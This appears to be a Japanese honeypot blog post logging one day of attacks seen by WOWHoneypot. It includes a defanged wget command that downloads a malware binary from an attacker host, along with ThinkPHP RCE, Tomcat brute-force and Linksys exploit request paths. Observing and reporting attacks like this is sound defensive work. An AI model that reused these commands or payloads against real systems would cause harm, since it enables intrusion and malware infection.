23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(183日目)

2019/09/15(日)

トータルは2264件でした。

ハンティングログは以下です。

211.193.211[.]96 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

アメリ 2200
中国 23
香港 6
ブラジル 5
インド 4
ロシア 3
イタリア 3
エクアドル 2
イラン 2
ウクライナ 2
シンガポール 2
ノルウェー 1
ラトビア 1
イギリス 1
フランス 1
ケニア 1
コロンビア 1
リビア 1
トルコ 1
エストニア 1
ドイツ 1
韓国 1
オランダ 1

f:id:sec23:20190916123120p:plain

件数 概要 リクエス
2190 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
45 アクセス GET /
4 phpMyAdminの調査 GET /admin-scripts.asp
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 Tomcatの調査 GET /manager/text/list
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 不明 GET /shell?busybox
1 不明 GET /category/1
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 クローリング HEAD /robots.txt
1 不正中継の試み CONNECT www.wikipedia.org:443